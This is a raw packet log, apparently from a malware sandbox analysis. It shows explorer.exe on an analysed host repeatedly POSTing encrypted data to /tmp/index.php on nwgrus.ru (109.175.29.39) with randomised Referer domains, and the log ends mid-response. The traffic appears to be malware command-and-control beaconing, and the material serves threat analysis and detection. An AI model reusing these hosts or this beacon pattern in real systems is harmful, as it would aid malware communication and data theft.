Oct 14, 2024 10:02:55.364646912 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nnhkspmojwnsnbxu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: nwgrus.ru
Oct 14, 2024 10:02:55.364675999 CEST	286	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 44 20 bb bc Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuD JSobmjK$i$C[s#`OJ88_,!!Kw,^7sRpL-Bum]`fs=%nL-?
Oct 14, 2024 10:02:56.160439014 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:56.168869972 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yvnodxcwkvd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 115 Host: nwgrus.ru
Oct 14, 2024 10:02:56.168869972 CEST	115	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 7f 07 ab 89 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuM;p{n3Wmu/
Oct 14, 2024 10:02:56.967535973 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:56.975419044 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dgiwvsfymyh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 180 Host: nwgrus.ru
Oct 14, 2024 10:02:56.977700949 CEST	180	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 7e 1b ef e7 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu~(ggN!ZE\*{MRsQt;;Z)H)^6$8$1~%z(h%U
Oct 14, 2024 10:02:57.801300049 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49759	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:57.810257912 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wrjytrffmsivlanr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 138 Host: nwgrus.ru
Oct 14, 2024 10:02:57.810257912 CEST	138	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 2b 54 c3 fd Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu+T~Qubfd:QR`{RcY:oC#+
Oct 14, 2024 10:02:58.602148056 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:58 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49760	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:58.611738920 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://estmwlacexvuyc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 214 Host: nwgrus.ru
Oct 14, 2024 10:02:58.611777067 CEST	214	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 35 21 a4 ba Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu5!wH[sUk.z-bqFq=x24C5UuE'{KFR1amYoN)@)pBV:)G'
Oct 14, 2024 10:02:59.500734091 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49761	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:59.509779930 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hvvqajwisec.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 162 Host: nwgrus.ru
Oct 14, 2024 10:02:59.509802103 CEST	162	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 62 0a d2 f0 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vubMdcKJi2t1\qLxm@_N%ZH[+sM(\|
Oct 14, 2024 10:03:00.324894905 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:03:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49762	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:03:00.333209991 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kctacxfnspruuv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 166 Host: nwgrus.ru
Oct 14, 2024 10:03:00.333230972 CEST	166	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 5c 39 ea 9d Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu\9w\dq+2ykts2/IwI:ZWT0KwK</
Oct 14, 2024 10:03:01.241354942 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:03:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49763	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:03:01.404306889 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ijnkeenpcqt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 348 Host: nwgrus.ru
Oct 14, 2024 10:03:01.404340982 CEST	348	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 3f 53 df bd Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu?S vk!)LYho%@A.N+4z6D-W8C+)E ZO\ z0['&8Kc1D[F^f"3D=/
Oct 14, 2024 10:03:02.205260992 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:03:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49764	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:03:02.219935894 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lnnfpwyulse.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 208 Host: nwgrus.ru
Oct 14, 2024 10:03:02.219971895 CEST	208	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 22 0b ee e0 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu"gHgO+6nu6wA%FxF<E8U:%K(,"u@O$Qq-7}
Oct 14, 2024 10:03:03.013564110 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:03:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49765	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:03:03.022027969 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pkoncbxvmuq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 137 Host: nwgrus.ru
Oct 14, 2024 10:03:03.022027969 CEST	137	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 21 2e c1 f4 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu!.Vcr^bqe2D4]+vE=
Oct 14, 2024 10:03:03.815471888 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:03:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 